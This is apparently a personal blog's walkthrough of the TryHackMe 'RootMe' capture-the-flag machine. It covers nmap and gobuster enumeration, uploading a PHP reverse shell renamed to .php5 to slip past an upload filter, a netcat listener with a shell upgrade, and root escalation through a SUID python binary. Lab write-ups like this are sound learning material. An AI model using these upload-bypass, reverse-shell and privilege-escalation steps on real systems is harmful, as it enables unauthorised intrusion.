Vernilo hacks stuff
  • Home
  • 📦Hack The Box Write-ups
    • 📋Challenges
      • 🟢Reversing: Baby RE
      • 🟢Crypto: Templed
      • 🟢Crypto : Bank Heist
      • 🟢Web: emdee five for life
      • 🟠Web: Freelancer
    • 🖥️Machines
      • 🟢Spectra
      • 🟢Blunder
      • 🟢Cap
      • 🟢Knife
      • 🟠The Notebook
  • 🌧️Try Hack Me Write-ups
    • 🟢RootME
    • 🟢Pickle Rick
    • 🟢Ignite
    • 🟢Bounty Hacker
    • 🟠Dogcat
  • 📝Blog Posts
    • 🔗Understanding potential vulnerabilities in authentication mechanisms
Powered by GitBook
On this page
  • RootMe
  • Questions
  • Enumeration
  • Nmap
  • finding Directories/files
  • user.txt
  • root.txt / Privilege Escalation

Was this helpful?

  1. Try Hack Me Write-ups

RootME

PreviousTry Hack Me Write-upsNextPickle Rick

Last updated 3 years ago

Was this helpful?

A ctf for beginners, can you root me?

Questions

  • Scan the machine, how many ports are open?

  • What version of Apache are running?

  • What is the hidden directory?

  • user.txt?

  • Search for files with SUID permission, which file is weird?

  • root.txt?

Enumeration

Nmap

nmap -sSVC -A -O -vv

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9irIQxn1jiKNjwLFTFBitstKOcP7gYt7HQsk6kyRQJjlkhHYuIaLTtt1adsWWUhAlMGl+97TsNK93DijTFrjzz4iv1Zwpt2hhSPQG0GibavCBf5GVPb6TitSskqpgGmFAcvyEFv6fLBS7jUzbG50PDgXHPNIn2WUoa2tLPSr23Di3QO9miVT3+TqdvMiphYaz0RUAD/QMLdXipATI5DydoXhtymG7Nb11sVmgZ00DPK+XJ7WB++ndNdzLW9525v4wzkr1vsfUo9rTMo6D6ZeUF8MngQQx5u4pA230IIXMXoRMaWoUgCB6GENFUhzNrUfryL02/EMt5pgfj8G7ojx5
|   256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBERAcu0+Tsp5KwMXdhMWEbPcF5JrZzhDTVERXqFstm7WA/5+6JiNmLNSPrqTuMb2ZpJvtL9MPhhCEDu6KZ7q6rI=
80/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: HackIT - Home

Q: Scan the machine, how many ports are open?

A: 2

Q: What version of Apache are running?

A: 2.4.29

Q: What service is running on port 22?

A: ssh

finding Directories/files

(the ip is different because I continued that writeup the other day)

Q: What is the hidden directory?

A: /panel/

checking the directory /panel/, we have

let's try to upload a shell

remember to set a port to listening

nc -lvp PORT

"PHP isn't permitted"

let's try bypassing this using the ".php5" extension

mv revs.php revs.php5

it worked

to run click on "veja" ("see")

it worked, we have shell

to get a tty

python -c 'import pty;pty.spawn("/bin/bash")'

Ctrl+Z

stty raw -echo

fg

export TERM=xterm

user.txt

finding

find / -type f -name user.txt 2>/dev/null

getting

cat /var/www/user.txt

root.txt / Privilege Escalation

To look for the files with SUID permission we can use the command:

find / -type f -user root -perm -4000 2>/dev/null

Exploring python set uid capabilities

python -c "import os;os.setuid(0);os.system('/bin/bash')"

getting

gobuster dir -u -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -t 33 -x html,php,txt

shell:

curl -o revs.php

image

🌧️
🟢
RootMe
http://10.10.63.255:80/
https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
image
image
image
image
image